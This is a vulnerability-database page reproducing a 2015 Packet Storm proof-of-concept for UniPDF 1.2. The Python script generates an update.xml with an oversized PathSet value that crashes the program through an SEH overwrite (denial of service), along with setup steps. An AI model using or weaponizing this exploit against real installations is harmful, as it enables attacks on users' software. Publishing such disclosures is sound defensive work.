Lucene search
K

UniPDF 1.2 Buffer Overflow

🗓️ 27 Apr 2015 00:00:00Reported by Avinash Kumar ThapaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC. Exploit for Windows XP- Service Pack 3 and Windows 7 Home Basic

Code
`# Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC  
# Author : Avinash Kumar Thapa "-Acid"  
# Date of Testing : 25th April 2015  
# Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic  
# Vendor Homepage: http://unipdf.com/  
# Software Link: http://unipdf.com/file/unipdf-setup.exe  
# Steps to reproduce the Crash is:  
# Step 1: Run the POC  
# Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there  
# Step 3 : Run the UniPdf.exe   
  
buff2 = "\x41" * 3000  
crash = " <config>\n"  
crash += " <UserDefine>\n"  
crash += "<Language ID=\"0\" />\n"  
crash += "<Path PathSet=\""+buff2+"\" Path=\"\" />\n"  
crash += "<ImageFormat set=\"2\" />\n"  
crash += "<Res set=\"96\" />\n"  
crash += "<bit set=\"24\" />\n"  
crash += "<Prefix set=\"\" />\n"  
crash += "<Doc set=\"1\" />\n"  
crash += "<Help set=\"1\" />\n"  
crash += "</UserDefine>\n"  
crash += "</config>\n"  
  
print "POC Created By -Acid"  
print " [email protected]"   
file = open("update.xml","w")  
file.write(crash)  
file.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation